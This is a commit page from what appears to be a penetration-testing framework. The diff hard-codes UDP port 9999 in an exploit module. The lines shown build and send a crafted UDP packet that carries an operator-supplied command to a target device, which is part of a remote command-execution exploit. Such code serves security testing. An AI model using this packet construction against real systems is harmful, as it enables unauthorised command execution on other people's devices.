Commit 3a7b8941 by Marcin Bury

Fixing port option - static 9999.

parent 6941fb47
...@@ -44,7 +44,6 @@ class Exploit(exploits.Exploit): ...@@ -44,7 +44,6 @@ class Exploit(exploits.Exploit):
} }
target = exploits.Option('', 'Target address e.g. 192.168.1.1') target = exploits.Option('', 'Target address e.g. 192.168.1.1')
port = exploits.Option(9999, 'Target Port')
def run(self): def run(self):
try: try:
...@@ -56,7 +55,7 @@ class Exploit(exploits.Exploit): ...@@ -56,7 +55,7 @@ class Exploit(exploits.Exploit):
else: else:
print_error("Target is not vulnerable") print_error("Target is not vulnerable")
except socket.error as ex: except socket.error as ex:
print_error("Socket error ({ex}). It most likely means that something else is listening locally on port UDP:{port}. Make sure to kill it before running the exploit again.".format(ex=ex, port=self.port)) print_error("Socket error ({ex}). It most likely means that something else is listening locally on port UDP:{port}. Make sure to kill it before running the exploit again.".format(ex=ex, port=9999))
def command_loop(self): def command_loop(self):
while 1: while 1:
...@@ -72,12 +71,12 @@ class Exploit(exploits.Exploit): ...@@ -72,12 +71,12 @@ class Exploit(exploits.Exploit):
return return
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', self.port)) sock.bind(('0.0.0.0', 9999))
sock.settimeout(2) sock.settimeout(2)
packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00') packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
sock.sendto(packet, (self.target, self.port)) sock.sendto(packet, (self.target, 9999))
while True: while True:
try: try:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment